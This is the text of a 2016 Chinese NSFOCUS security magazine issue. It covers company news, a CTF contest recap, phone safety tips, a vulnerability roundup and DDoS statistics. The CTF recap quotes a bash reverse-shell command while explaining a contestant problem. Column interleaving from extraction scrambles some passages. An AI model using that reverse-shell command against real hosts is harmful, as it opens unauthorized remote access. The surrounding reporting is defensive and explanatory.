Size: px
Start display at page:

Download ""

Transcription

1

2

3 安全形势绿盟科技与华为联手落地软件定义的云安全防护体系力促合作伙伴共赢绿盟科技发力渠道大会绿盟科技连续 5 年保持漏洞管理市场占有率第一 Techworld 2016 攻防大赛花絮手机怎么用才安全? 给大家 7 个建议网络安全威胁月报 绿盟科技 Q2 DDoS 态势报告报告最全的反射型 DDoS 攻击 Security Fabric 软件定义的弹性安全云 廖新喜周博陈颐欢潘文欣杨旭孙叶王琼苗宇刘文懋 封面故事 不忘初心回看转型叶晓虎 行业热点 刍议云计算安全与安全服务化 张智南 32 解读银监办发 [2016]107 号文张龙飞 37 解读金融行业等保标准中的网络安全要求物联网安全概述工控系统的综合保障思考运营商行业全国检查经验分享智慧安全 2.0 Windows10 RS1 新安全特性 俞琛张星张学聪李贵鹏王岚敖屹立周慧芳张云海 做真正适合自己的网站安全监测平台卢梁 68 深入探析交互式扫描技术 李虎 73 1

4 安全形势 绿盟科技与华为联手落地软件定义的云安全防护体系 绿盟推出软件定义安全防护系统, 采用全新的软件定义安全架构, 极大提升了 Web DDoS 攻击防护的灵活度和效率, 为防守者的应急响应争取时间 相比传统抗 DDoS 防护方案, 将获得如下优势 : 1. 客户可以同时抑制 DDoS 和 Web 攻击 ; 2. 客户可以模块化按需建设, 节省投资 ; 3. 大流量 DDoS 攻击防护与 Web 应用防护相结合, 因软件定义而随 击 应变 ; 4. 根据攻击特征快速调整安全策略和响应速度, 免设备配置 此方案将推动运营商抗 D 服务达到国 016/9/6, 绿盟科技作为华为 SDN 产业生态伙伴之一, 参加华为全联接大会 来自 120 2多个国家和地区的 名业界精英, 围绕 塑造云时代 主题, 共同探讨云时代趋 势与洞察, 以及各行各业如何通过打造云技术 构筑云生态, 积极实现数字化转型 会上绿 盟展示了能够应用于华为 SDN 控制器的软件定义安全防护系统 云 已经成为 ICT 技术和服务领域的 常态 而云环境下面所临的安全威胁, 常规手 段难以应对, 防守者的优势已经退却, 攻守双方在安全问题到来时, 也在争夺黄金 72 小时 内外领先水平, 切实有力地实践了云安全解决方案 华为公司致力于打造 SDN 开放生态环境, 通过网络能力开放, 为客户提供更丰富 更高效 更安全的网络功能和服务 绿盟科技的智慧安全及软件定义安全体系融入到华为 SDN 生态圈, 有利于加速 SDN 安全系统的完善和落地 2

5 安全形势 力促合作伙伴共赢绿盟科技发力渠道大会 016 年 7 月 28 日, 绿盟科技在西安凯宾斯基 ( 锦江国际 ) 大酒 2店隆重举办 共筑安全梦想, 携手共创未来 绿盟科技 2016 全国合作伙伴大会 来自全国百余位合作伙伴和客户亲临现场, 与 绿盟共话新时代如何抓住机遇, 共谋发展 会上, 绿盟科技详细介 绍了 2016 年绿盟科技的渠道战略 解读了最新的渠道政策, 展示了 绿盟科技在网络安全 威胁情报 大数据 云平台 服务 敏捷网 络等方面领先的产品和解决方案 这次绿盟科技邀请了网络安全行业的英雄豪杰们, 一同携手共赢蓝海, 感受产业变革带来的力量 本次绿盟科技 2016 全国合作伙伴大会有哪些亮点呢? 快来和绿盟君一起围观 时势造英雄在十三五信息化建设的历史机遇下, 在网络应用发展波涛汹涌的浪潮中, 网络安全的需求日益凸显, 时代赋予了我们展现英雄本 大会主会场 3

6 安全形势 色的机会 在如此大趋势下我们如何应势而 为? 国家信息中心专家给大家带来了精彩的 户构建态势感知分析预警平台, 和我们云端的专家及合作伙伴一起共同构建设备闭环和管理 闭环的系统蓝图, 这种构建是聪者听于无声 明者见于未形的一种方式 演讲, 在全球城市化 经济全球化 全球信息化和信息智慧化的四大趋势面前, 我们需要坚持自主创新, 需要更好地来满足应用需求, 同时加强信息安全保障, 从而推动我们信息化建设的发展 工业控制信息安全技术国家工程实验室专家为我们解读了 等级保护与绿盟的责任, 清晰明确的指出, 合规是博弈的前提和基础 ; 对抗中的防御体系是需要用合规来保证的 ; 合规需要做科学的安全需求分析 绿盟科技作为巨人背后的安全专家 业内的领军企业代表, 要始终以技术引领市场, 与国家战略 保持一致, 坚持以专业严谨的态度成为最受用户和合作伙伴信赖的网络安全公司 技术显英雄网络技术蓬勃发展, 网络应用日新月异, 安全面临的威胁亦是愈发严峻 但是越是有挑战, 越是给了我们彰显技术实力的舞台 在这里, 由绿盟科技专家解读了前沿网络安全技术趋势, 在面对现今的安全态势, 绿盟科技用威胁情报来作为安全驱动力, 帮助客 面对网络复杂多变的形式, 绿盟科技提出了智慧安全 2.0 战略, 这是一个企业整体运营的升级换代过程, 也是传统网络安全公司的下一代生存方式 利用云计算 移动计算和互联网思想和技术, 让业务系统 安全系统 安全专家和维护人员 决策和执行活动等可以迁移到线上, 利用软件定义架构 持续集成等提升安全运营效率和时效性 利器助英雄战场拼杀离不开趁手的兵刃, 商场如战场, 我们的合作伙伴们同样也需要给力的渠道支持政策以及优秀的产品支撑 宝剑赠英雄, 绿盟科技为合作伙伴们驰骋市场, 建设适合绿盟业务模式的, 以核心合作伙伴为基础的销售管理体系, 能充分 有效 快速覆盖目标客户市场, 成为合作伙伴首选的网络安全供应商 4

7 安全形势 煮酒论英雄 绿盟科技专家解读了 2016 年渠道体系建设及政策, 强调了规则的重要性, 需要统一标准, 才能建立信任, 达成合作共赢, 而且对合作伙伴而言, 规则不仅是约束, 更是一种保护, 渠道建设涉及面广 影响深远, 任何政策调整都是牵一发而动全身 风云话英雄 英雄的战绩给我们带来无数启发, 豪杰 的风采更让我们心向往之, 风云际会间心扉 敞开, 笑看风云时畅谈共话 绿盟科技合作伙 颁奖典礼 伴代表分享了渠道销售体系, 将绿盟产品从总代经金牌或认证代理销售到直接客户, 金牌的数量越多, 认证代理商越多, 产出就越大 ; 同时金牌和认证代理每家产出越多, 销量也就越大 合作伙伴代表表示, 谨记时代的需要, 公司的需要, 自身的需要, 与绿盟科技一同携手, 共筑安全梦想, 共创美好未来 小结 2016 年是 十三五 规划开局之年, 也是全面深化改革 加快形成引领经济发展新常态的体制机制和发展方式的关键之年 站在新一个五年的开端, 绿盟科技将坚持智慧安全 2.0 的创新战略, 围绕企业业务本质做进一步的组织转型, 持续加大在行业内的营销投入 ; 进一步优化对渠道合作伙伴的差异化 精准化以及多元化的激励政策, 牵引合作伙伴转型和能力提升 ; 将持续构建安全服务体系, 与合作伙伴进行更好的服务利益分享, 提升新商业模式下的服务能力和可销售性 5

8 安全形势 绿盟科技连续 5 年保持漏洞管理市场占有率第一 IDC 2015 年中国网络安全市场份额报告发布, 绿盟科技凭借在漏洞管理市场的优异表现, 以 25.1% 的市场份额排名连续五年保持第一 作为国内漏洞评估市场的第一品牌, 绿盟远程安全评估系统 (NSFOCUS RSAS) 自 2001 年上市至今已有 15 年的市场验证经验, 客户群遍布金融 运营商 政府 能源 教育 医疗 交通等行业 依托绿盟科技多年的漏洞挖掘和安全服务实践经验, 绿盟 RSAS 可高效 全方位的检测网络中存在的脆弱性风险, 提供专业 有效的安全分析和修补建议, 并贴合安全管理流程对修补效果进行审计, 最大程度减小受攻击面 同时, 绿盟 RSAS 具备灵活的部署方式, 既支持在虚拟化环境下直接部署, 也支持 IPv6 网络环境下的部署和漏洞扫描, 而且针对安全领域爆发的紧急热点漏洞, 绿盟 RSAS 安全响应团队可在业内第一时间发布紧急漏洞检测插件, 帮忙用户及时识别安全隐患 此外, 绿盟科技也是国内漏扫产品最全面的公司, 覆盖从盒子到软件到 SaaS 服务的全部产品形态, 包括系统漏洞 配置核查 web 漏洞 网站监测 工控系统漏洞评估等多款专门的安全评估产品和服务 绿盟科技将继续紧贴客户需求, 不断进行业务创新, 为客户提供一流的脆弱性风险管理方案, 帮助客户减少网络风险, 满足合规要求 6

9 安全形势 Techworld 2016 攻防大赛花絮 威胁情报与网络安全实验室廖新喜 关键词 : 攻防大赛比赛花絮绿盟科技技术大会 Techworld 2016 摘要 : 历年来, 攻防大赛都是绿盟科技技术大会的亮点模块之一 今年参赛队伍众多, 最终选出 17 个队伍参加最后角逐, 主要来自绿盟科技各大区服务交付中心 研发中心及 5 个行业客户团队, 由于人数众多不得不一再扩大比赛场地 为了尽可能让比赛接近现实的攻防实战, 赛制特别强调 不择手段, 即参赛者除直接攻击外, 也可使用钓鱼邮件 挂马等手段获取目标主机权限 比赛中有队员两台机器 mac 一致导致网络断断续续的郁闷, 也有队员在提交第一个 flag 的激动, 还有采取 作弊 方式监听别人的流量获取 flag, 更有直接读其他队伍未删除文件的, 大家都是脑洞大开, 比赛实在精彩绝伦 这不是一篇口水文, 对于大部分队员纠结的 bash 反弹 payload 不适用也有详尽解释 月火热的太阳炙烤着大地, 在知了玩命的叫声中, 绿盟科技一 7年一度的攻防比赛圆满结束了, 下面请随我一同回顾下这精彩 火热的比赛 清晨 7:30, 工作组的人员就全部到达了会场, 将头一天就已经 配好的网络环境和机器一一重启, 又进行了一次访问性测试 而各 位参赛队员也都非常重视这场 CTF 比赛, 大家怀着激动的心情, 早早地就来到了会场签到, 大家兴奋在门口探头探脑 但是为了公平起见, 工作组要求各参赛队伍先到会厅外头休息, 直到八点半才能入场, 并且在 9 点之前, 将被攻击主机断开网络连接, 只开放裁判机用以熟悉提交 flag 和 writeup 7

10 安全形势 9:00, 比赛正式开始, 工作组人员将网络访问权限打开, 各个参赛队伍快马加鞭的发起了网络扫描, 以便发现网络拓扑, 也有部分队员紧盯着 blog,blog 上面或明或暗提示着各种信息, 用于进一步的漏洞挖掘 就在此时发生了一个小插曲, 有一只队伍的两位队员,ping 网络环境总有丢包现象, 然而这种情况这在前一天的测试中从未发现, 很新奇, 给换了网线也无济于事, 换了其他机器则是没问题, 到交换机一排查, 发现两个 mac 地址冲突, 原来是参赛队员在以前的某次测试中将 mac 地址改为了同一个, 因为这个小小的疏漏导致这个队伍整整耽误了半个多小时的时间, 估计他们此时心中郁闷的翻江倒海, 焦急的万马奔腾 而此时, 工作组查看 TAC 的流量, 一下子飙升到几十 M, 猜测大家在开足马力在进行扫描以发现网络入口 从下图就能看出大家紧张但不失秩序的场面 一定在傲娇的想居然这么快被我搞到 flag 了 这个时候我下去转了一圈, 也就只有这支队伍在搞 ftp 越权的漏洞, 其他的队伍都在搞环境的另一个入口 wordpress 的 ImageMagick 漏洞, 说明大家在博客的引导下都已经上道, 知道有台服务器存在 ImageMagick 漏洞 当然也有些队员在用 wpscan 等各类 web 扫描器在进行扫描, 如此的大并发造成 wordpress 的环境不太 稳定, 用扫描器的效果并不明显 其实这个时候思路都已经有了, 就看哪只队伍有最快的操作速度, 比的就是实战经验和基本功 这也从侧面说明一个问题, 大部分队伍对 web 漏洞更熟悉, 所以集中精力搞 web 漏洞, 当然竞争更激烈, 而搞 ftp 漏洞的队伍则捡了个便宜 10:07, 阿啵呲 首先提交了 wordpress 的 flag, 两个内网入口的服务器都被搞定, 完全符合我们出题人此前的预期, 与此同时正在搞 wordpress 服务器却卡在某些步骤的队伍, 明显着急了起来, 开始手脚并用的拼速度 每 9:27, 第一个 flag 提交, 真的好快, 北风一队 以迅雷不及掩耳之势通过目录穿越直 接拿到了 ftp 服务器 flag, 该名队员情绪十分激动的, 提交 flag 的时候, 手都在抖动, 心里 一次某台服务器的首次被攻破都可能影响其他 队伍的心态和工作思路 比分显示牌上已经有 8

11 安全形势 了两只队伍提交了 flag, 随着比分牌的滚动, 大家都明显要快起来了, 此时观摩组的成员也在小 声地议论着, 这两个队伍会进入前三名吗? 我们拭目以待 flag, 分数冲到了 600 分, 非常有夺取第一 名的潜质, 分别拿下了外网 ftp, 内网域控 和内网员工 A, 内网域控是通过社工关联猜测口令, 员工 A 则是弱口令, 从这个侧面也说明了北风一队渗透实力相当强悍 我又下去转了一圈, 发现部分队员一直纠结在为什么网上的 payload 不可用的问题, 总质疑环境和网络 质疑我们的环境和网络是不对滴, 在此说明一下, 这台 wordpress 服务器运行的系统是 ubuntu,ubuntu 的默认 sh 是 dash, 它会将反弹命令中 ">" 提前解析, 使 "/dev/tcp/ /55" 当作一个文件, 破坏了 bash 格式, 当然通过 (bash -i >& / dev/tcp/ /55 0>&1) 反弹 shell 不能成功, 在比赛中可能大家都比较急, 思 10 点多第一个 writeup 提交, 是写的 ftp 漏洞, 我们为该队加上该题目的一半分数, 工作人员审查了 flag, 是通过目录穿越拿到的 flag, 但是要进一步进内网, 还需要提权并给 ftp 服务器加上另外一个操作系统账户 11 点多的时候各个队伍就开始补充能量, 工作人员为大家准备了面包, 咖啡, 水果等, 可是大家都在紧张的关注比赛, 都是一边啃着面包一边盯着屏幕 然后工作人员发现有部分队员竟然借着面包咖啡做掩护, 进行非法扫描裁判机, 工作组立即通过 WAF 定位到某些队伍并给予严重警告 12:00, 截止到目前为止, 已经有 6 支队伍提交了 flag, 其中北风一队已经提交了 3 个 路转变非常难导致钻牛角尖 13:30, 又有三个队伍首次提交了 flag, 在这修生养息的一个半小时时间内, 已经有 5 支队伍在 wordpress 这台机器上执行反弹脚本还有控制大马导致服务器不堪压力,cpu 的负载能达到 7, 于是工作组给 wordpress 的 php 引擎每隔三分钟重启一次, 以保持稳定 同时几个队伍对 ftp 服务 9

12 安全形势 器的控制更趋白热化, 由于只开放了三个远程桌面," 业余酱油 " 队 的队员反馈说, 他们上传的代码重连五次才得以点击执行按钮, 甚 山论贱 拿下榜眼, 探花则落到了 业余酱油 下面我们来看下最 终 flag 积分图 : 至还有队员故意修改服务器的密码 14:00, 由于内网的部分题目大家都没有思路, 工作组成员决定善良的将内网的网络拓扑都公布出来, 并且提示大家给员工 B 发邮件要带附件 早上收到的邮件中都没收到附件 这个时候工作人员发现了有点小意思的事情, 有队员在 ftp 服务器上装了监听流量的木马, 从而盗取其他队伍从这个入口进入内网获取的 flag, 这难道不是一种比较好的拿 flag 方式吗? 从服务器角度来看,14 个队伍搞定了 wordpress 服务器 ( 图中外网 web), 分析各支队伍提交的 writeup 还是挺有意思的, 有通过命令执行中的打包 flag 然后下载的, 有重定向 flag 到可读目录的, 还有直接读其他队伍重定向文件的, 最通用的当然是通过下载 python 后门然后执行的 10 个队伍搞定了 ftp 服务器 ( 图中外网 ftp), 三个队伍成功发送了带后门的附件拿到远控权限 一个队伍通过弱口令破解了员工 A 的电脑, 最终就只剩下两台服务器没有一支队 15:30, 又有三支队伍提交了 flag, 这个时候差不多所有队伍都拿到了分数 由于大家都在争夺 ftp 和 wordpress 的控制权, 导致下午分数变动较少, 提早拿到 flag 占住服务器的队伍占到了很大优势 16:00, 紧张激烈的比赛终于结束," 北风一队 " 拿下状元, 华 伍搞定 本次大赛无论对出题人还是参赛选手都是一次很好的磨练, 大家在比赛中了解到自己的优点与不足, 也理会到了团队精神的重要 再次恭喜拿到大奖的三支队伍, 明年夏天的攻防大赛, 期待你的参与 10

13 安全形势 手机怎么用才安全? 给大家 7 个建议 总裁办周博 关键词 : 移动终端安全个人数据泄露手机安全常识摘要 : 移动终端 ( 手机 Pad) 现在不仅作为通讯 娱乐设施, 还可能存储了个人的隐私数据 ( 如照片 短信记录 微信记录等 ), 而且随着移动办公需求增加, 移动终端可能还存有公司内部信息或商业机密信息, 如工作用 PPT/WORD 文档 公司邮箱邮件等 那么移动终端丢失 或中病毒木马后, 不仅可能会造成这些数据会丢失, 还可能会造成这些数据的泄露, 对个人乃至公司造成不可估量的影响 C, 大家都了解了一些基本的电脑安全常识, 那么 P在移动互联网时代, 如何能够将移动终端的安全风险降到最 低呢? 本文就给大家介绍 7 个简单好用的移动终端安全常识 1. 设置自动锁屏和解锁密码 在 PC 时代, 设置开机登录密码是大家都知道的常识 对于移 动终端来讲, 自动锁屏且设置解锁密码同样是必不可少的, 是防止 移动终端丢失后他人获取数据的最简单且比较有效的手段, 而且移 动设备上多了图形手势 指纹或人脸方式解锁, 更加便捷 但是, 要用这些解锁方式确保安全需要有几个前提 : A.IOS 系统不要越狱, 安卓系统不要 root 不要打开 USB 调试 : 否则能通过工具不刷机就取消锁定, 得到用户数据 ( 刷机是会删除用户数据的, 所以不用怕他刷机 ) B. 解锁密码复杂度要高 : 要包含字母和数字 其他解锁方式失败后都会提示用密码解锁, 密码是最后的保障, 但如果是 4 位数字简单密码, 那么总会有方法破解的, 无论是人工猜测或者下面链接里提到的用电脑暴力破解 2. 外置 SD 卡慎用这个很容易理解, 移动设备丢失后能随意取出 SD 卡, 或者设备放在桌子上时, 不拿走设备就直接取出外置 SD 卡, 相当于把 U 盘放桌面 那么外置 SD 卡就不要存放敏感信息了 11

14 安全形势 3. 日常关闭蓝牙和个人热点利用蓝牙攻击软件可以开启蓝牙的手机关机 重启 停止响应, 甚至盗取手机通讯录 拷贝手机中的文件 手机开启的个人热点毕竟还是无线网络, 无线网络存在的各种缺陷 漏洞, 个人热点都存在, 存在被蹭网 被攻入手机的风险 所以, 移动办公终端的蓝牙和个人热点在不使用时应及时关闭, 个人热点密码应为强口令, 以防黑客通过蓝牙和个人热点漏洞进行攻击 4. 及时更新补丁同电脑一样, 移动操作系统同样存在已知的和未知的安全漏洞, 不及时更新补丁, 可能点击一个链接就被中木马, 中木马的最严重后果, 不是个人数据丢失 泄密, 是什么呢? 请看下面的案例 : 下图是一个在我身边发生的真实案件, 这位朋友的农行卡中 2 万多元在几天内被 XX 通 XX 宝转走 经过分析, 这个农行卡应该是被注册了各种快捷支付 开通快捷支 付需要三个信息 : 卡号 身份证号和银行留存手机号, 并输入手机收到的验证码 卡号 身份证号 手机号在当今社工库泛滥的环境下不难得到, 那验证码是如何得到的呢? 这位朋友的手机一直在身边也从未借出过, 也没有停机, 排除了 sim 卡被挂失重办的嫌疑, 那唯一的可能就是手机中木马, 验证码短信被木马劫持并发给犯罪分子 所以要提醒大家, 移动办公终端操作系统要按系统提示及时更新安全补丁, 避免受到已知漏洞的影响 5. 不要越狱和 ROOT IOS 的越狱和安卓的 ROOT 对于普通用户来说没有任何必要, 如果有人觉得不越狱或 ROOT 我就安装不了杀毒软件, 使用不了骚扰电话短信拦截软件, 那么你就需要明确知道你面临的风险 : 任何 APP 都可以控制 读取 修改你手机或 pad 的任何功能和信息, 包括恶意 app 中隐藏的木马 6. 正规渠道安装应用如果从非正规渠道, 比如大街上商场里扫个二维码安装 一个小应用里推荐的应用 非苹果和谷歌官方的应用市场安装, 都存在安装的应用不是官方本身的应用 被捆绑恶意代码的风险 哪怕是苹果官方的应用市场, 都不能保证所有上架 app 都经过完整专业的代码审计, 不过那也比非官方市场风险小得多 所以, 应用要从正规应用市场安装, 同时注意应用开发商是否是官方, 以免受到恶意应用的侵害 公司内部的应用要从公司制定页面安装 7. 接入安全可信的网络环境建议移动终端在使用需联网的办公软件或使用和财产 隐私相关的应用时, 仅接入安全可信的网络环境, 可信的网络包括如下三类 : 运营商移动网络 (3G/4G) 直接接入电信运营商的家庭 WIFI 热点 ( 比如联通宽带 移动宽带 ) 小运营商或小区运营的宽带也有一定风险 公司官方搭建的 WIFI 热点 切记在使用这些关键应用时不接入其他第三方商家提供的或可搜索到的免费 WIFI 热点, 减少网络中传输的数据被恶意无线网络监听和劫持的风险 12

15 安全形势 网络安全威胁月报 威胁情报与网络安全实验室陈颐欢 关键词 : 高危漏洞 DDoS 攻击事件安全会议绿盟科技漏洞库绿盟科技博客摘要 : 绿盟科技网络安全威胁周报及月报系列, 旨在简单而快速有效的传递安全威胁态势, 呈现重点安全漏洞 安全事件 安全技术 获取最新的威胁月报, 请扫描左侧二维码, 访问绿盟科技博客 一.8 月数据统计 1.1 高危漏洞发展趋势 2016 年 8 月绿盟科技安全漏洞库共收 录 194 个漏洞, 其中高危漏洞 72 个 相比 7 月份的高危漏洞数量大幅下降 1.2 互联网热点漏洞攻击者再次击中互联网心脏 Linux TCP 出现漏洞来源 : 简述 :TCP 部署在 2012 以后版本的 Linux 系统中 (3.6 及以上版本的 Linux 内核 ), 攻击者可能利用此漏洞绑架用户的通讯, 或者注入恶意软件, 让 HTTPS 加密连接失效, 甚至 Tor 洋葱头软件及其网络也可能被绑架 13

16 安全形势 zabbix 再爆高危 SQL 注入漏洞, 可获操作系统权限来源 : 简述 :zabbix 是一个开源的企业级性能监控解决方案 近日, zabbix 的 jsrpc 的 profileidx2 参数存在 insert 方式的 SQL 注入漏洞, 攻击者无需授权登陆即可登陆 zabbix 管理系统, 也可通过 script 等功能轻易直接获取 zabbix 服务器的操作系统权限 Google Chrome V8 引擎远程代码执行漏洞来源 : 简述 :Google Chrome V8 引擎 3.20 至 4.2 版本中存在远程代码执行漏洞, 该漏洞是由于源代码中 observe_accept_invalid 异常类型被误写为 observe_invalid_accept 攻击者可利用该漏洞造成 kmessages 关键对象信息泄露, 执行任意代码 基于 Android 至 5.1 版本系统的 WebView 控件开发的手机 APP 均可能受上述漏洞影响 ( 来源 : 绿盟科技威胁情报与网络安全实验室 ) 1.3 绿盟科技漏洞库十大漏洞 8 月十大安全漏洞由绿盟科技安全小组 <security@nsfocus. com> 根据安全漏洞的严重程度 利用难易程度 影响范围等因素综合评出, 仅供参考 查询漏洞库最新信息, 请访问 : nsfocus.net/index.php?act=sec_bug Microsoft Edge 脚本引擎内存破坏漏洞 (CVE )(MS16-096) NSFOCUS ID: 链接 : 综述 :Microsoft Edge 是内置于 Windows 10 版本中的网页浏览器 Microsoft Edge 未正确处理内存对象,Chakra JavaScript 引擎渲染方式存在多个远程代码执行漏洞 危害 : 远程攻击者可以通过诱使受害者打开恶意网页来利用此漏洞, 从而控制受害者系统 Cisco Adaptive Security Appliance SNMP 远程代码执行漏洞 (CVE ) NSFOCUS ID: 链接 : 综述 :Cisco ASA 5500 系列自适应安全设备是用于提供安全和 VPN 服务的模块化平台 Cisco Adaptive Security Appliance (ASA) Software 的 SNMP 代码存在安全漏洞 危害 : 远程攻击者发送构造的 SNMP 数据包到受影响系统, 可造成系统重载或远程执行任意代码 Google Chrome opj_j2k_read_sqcd_sqcc 函数堆缓冲区溢出漏洞 (CVE ) NSFOCUS ID: 链接 : 综述 :Google Chrome 是由 Google 开发的一款 Web 浏览工具 Google Chrome 之前版本,PDFium/OpenJPEG/ j2k.c/opj_j2k_read_sqcd_sqcc 14

17 安全形势 函数存在堆缓冲区溢出漏洞 危害 : 远程攻击者可以通过诱使受害者打开恶意网页来利用此漏洞, 从而控制受害者系统 Microsoft Office 内存破坏漏洞 (CVE ) (MS16-099) NSFOCUS ID: 链接 : 综述 :Microsoft Office 是微软公司开发的一套基于 Windows 操作系统的办公软件套装 Microsoft Office 未正确处理内存对象, 存在远程代码执行安全漏洞 危害 : 远程攻击者可以通过诱使受害者打开恶意 office 文档来利用此漏洞, 从而控制受害者系统 Mozilla Firefox 地址栏欺骗安全漏洞 (CVE ) NSFOCUS ID: 链接 : 综述 :Mozilla Firefox 是一个开源网页浏览器, 使用 Gecko 引擎 Android 系统上,Mozilla Firefox 48.0 之前版本存在安全漏洞, 远程攻击者通过左向右及右向左字符集, 可进行地址栏欺骗 危害 : 攻击者可以利用此漏洞进行钓鱼攻击 Qualcomm GPU 驱动程序提权漏洞 (CVE ) NSFOCUS ID: 链接 : 综述 :Android 是基于 Linux 开放性内核的手机操作系统 Nexus 5/5X/6/6P/7 (2013) 设备中,Android < , Qualcomm GPU 驱动程序存在安全漏洞 危害 : 本地攻击者可以利用此漏洞来提升权限, 对系统进行非授权的访问 Apple ios 内存破坏漏洞 (CVE ) NSFOCUS ID: 链接 : 综述 :ios 是由苹果公司为移动设备所开发的操作系统, 支持的设备包括 iphone ipod touch ipad Apple TV Apple ios < 之前版本,IOMobileFrameBuffer 的实现中存在安全漏洞 危害 : 本地攻击者可以利用此漏洞来提升权限, 对系统进行非授权的访问 phpmyadmin 远程代码执行漏洞 (CVE ) NSFOCUS ID: 链接 : 综述 :phpmyadmin 是 MySQL 数据库的在线管理工具 phpmyadmin 4.6.x < x < x < 存在远程代码执行漏洞 危害 : 远程攻击者可以通过向服务器发送恶意请求来利用此漏 15

18 安全形势 洞, 对服务器进行非授权的访问 Zabbix jsrpc.php profileidx2 参数 SQL 注入漏洞 NSFOCUS ID: 链接 : vulndb/34605 升权限, 对系统进行非授权的访问 ( 来源 : 绿盟科技威胁情报与网络安全实验室 ) 1.4 DDoS 攻击类型 8 月份绿盟科技科技威胁情报及网络安全实验室收集及梳理了超过 76 万次攻击, 其中 Chargen Flood NTP Flood SSDP Flood 占据了绝大部分, 这三类攻击的一个共性就是攻击的放大倍数比较高 综述 :Zabbix 是一个基于 WEB 界面的提供分布式系统监视以及网络监视功能的企业级开源解决方案 Zabbix 软件的 jsrpc. php 文件在处理 profileidx2 参数时存在 insert 方式的 SQL 注入漏洞 危害 : 远程攻击者可以通过向服务器发送恶意请求来利用此漏洞, 对服务器进行非授权的访问 AVG Internet Security avgtdix.sys 权限提升漏洞 NSFOCUS ID: 链接 : vulndb/34604 综述 :AVG Internet Security 是反病毒防护软件 AVG Internet Security 在实现上存在本地权限提升漏洞 危害 : 本地攻击者可以利用此漏洞来提 小提示 Chargen Flood :Chargen 字符发生器协议 ( Character Generator Protocol) 是一种简单网络协议, 设计的目的是用来调试 TCP 或 UDP 协议程序 测量连接的带宽或进行 QoS 的微调等 但这个协议并没有严格的访问控制和流量控制机制 流量放大程度在不同的操作系统上有所不同 有记录称, 这种攻击类型最大放大倍数是 倍 16

19 安全形势 NTP Flood : 又称 NTP Reply Flood Attack, 是一种利用网络中时间服务器的脆弱性 ( 无认证, 不等价数据交换,UDP 协议 ), 来进行 DDoS 行为的攻击类型 有记录称, 这种攻击类型最大放大倍数是 倍 SSDP Flood : 智能设备普遍采用 UPnP( 即插即用 ) 协议作为网络通讯协议, 而 UPnP 设备的相互发现及感知是通过 SSDP 协议 ( 简单服务发现协议 ) 进行的 攻击者伪造了发现请求, 伪装被害者 IP 地址向互联网上大量的智能设备发起 SSDP 请求, 结果被害者就收到了大量智能设备返回的数据, 被攻击了 有记录称, 这种攻击类型最大放大倍数是 30.8 倍 更多相关信息, 请关注绿盟科技 DDoS 威胁报告 二. 博客精选 Memcache 未授权访问漏洞利用及修复由于 memcached 安全设计缺陷, 客户端连接 memcached 服务器后无需认证就可读取 修改服务器缓存内容 Zabbix SQL 注入漏洞技术分析与防护方案 1n3 通过邮件披露了 Zabbix 软件的 jsrpc.php 文件在处理 profileidx2 参数时存在 insert 方式的 SQL 注入漏洞, 与官方通告的 latest.php 文件在处理 toggle_ids 参数时存在 insert 方式的 SQL 注入漏洞属于同一类型的漏洞, 只是攻击的位置不同 攻击者可以使用 guest 账户或者已经认证的账户登录, 然后利用此漏洞直接获取服务器的操作系统权限 ( 来源 : 绿盟科技博客 ) 三. 安全会议安全会议是从近期召开的若干信息安全会议中选出, 仅供参考 44CON London 时间 :2016 年 9 月 简介 : 44CON London 举行为期三天的技术会议 技术会议演讲主题覆盖互联网安全 漏洞挖掘及新的漏洞利用技术, 这些演讲来自许多安全专家及交流机会 网址 : 17

20 安全形势 绿盟科技 2016 Q2 DDoS 态势报告 IIS 技术团队潘文欣杨旭孙叶王琼 关键词 :DDoS 攻击类型 DDoS 攻击时间 DDoS 攻击流量 DDoS 态势报告摘要 : 日前, 绿盟科技发布 2016 Q2 DDoS 态势报告, 报告显示,Q2 平均攻击时长 1.6 小时, 单次攻击最长 387 小时 71T Q2 攻击时长在 30 分钟以下的攻击继续增长, 占总数的 77.6%, 比 Q1 季度增加 21.6% 本季度攻击时长超过 1 天的攻击占总攻击次数的 3.2%, 比上一季度下降了 8.7% 我们监控到最长的一次 DDoS 攻击持续了 387 小时, 累计总攻击流量达 71TBytes 2 DDoS 攻击更趋于短时攻击, Q其主要原因在于本季度反射攻击 混 合攻击 脉冲攻击更加活跃, 攻击者选择的 攻击手段趋于复杂化, 使用更短的时间就达 到更好的攻击效果 1. 全球攻击态势,50988 次 DDoS 攻 击, 绿盟科技监控数据显示,Q2 季度全球 发生 DDoS 攻击达 次 2. 攻击流量趋势,445.7 G 单次攻击 峰值,Q2 单一时间点攻击流量峰值 1.8T, 单次攻击峰值 445.7G,300G 以上的攻击 16 次 3. 攻击时间趋势,387 小时 71TB 单次攻击,Q2 平均攻击时长 1.6 小时, 单次攻击最长 387 小时, 其总流量达 71TB 4. 攻击类型趋势,62.1 % 的反射攻击, 从攻击次数占比看,Chargen 反射攻击占 27.6%, 从攻击流量大小占比看,SYN 为 54.7% 5. 混合攻击趋势,33.7% 的混合攻击, 从攻击流量大小占比看, 混合攻击占总比的 33.7%, 其中 2-3 种混合攻击占 97.4% 6. 反射攻击趋势,365 万 NTP 反射器, 从攻击次数占比看,Chargen 反射攻击占所 有反射类型的 38.1%, 从攻击流量大小占比 看,NTP 反射攻击占所有反射类型的 36.1% 扫描二维码, 获取报告手机版本 18

21 安全形势 全球攻击态势 绿盟科技监控数据显示,Q2 全球被 DDoS 攻击次数达到 50,988 次 16.7Gbps, 相比 Q1 的 27Gbps 下降 38.1%; 在 2016 年 5 月 18 日 8 点, 观测到的总体攻击流量峰值达到 1.8Tbps, 比 Q1 季度的 1.2Tbps 增长 600Gbps 本季度全球范围内绿盟科技监控到 50,988 次 DDoS 攻击, 受攻击最严重的国家是中国, 占全部被攻击国家的 53.2%, 其次是美国, 占比 22.6% 本季度中国共发生 27,125 次 DDoS 攻击, 受攻击最严重的地区是浙江 广西 广东 香港 江苏等东南沿海地区 本季度 DDoS 攻击单次最高峰值为 445.7Gbps, 相比 Q1 季度 的 615.1Gbps 峰值有所下降 攻击流量趋势 Q2 单一时间点攻击流量峰值 1.8T, 单次攻击峰值 445.7G, 300G 以上的攻击 16 次 Q2 季度的 DDoS 平均攻击峰值有所下降,Q2 平均攻击峰值为 19

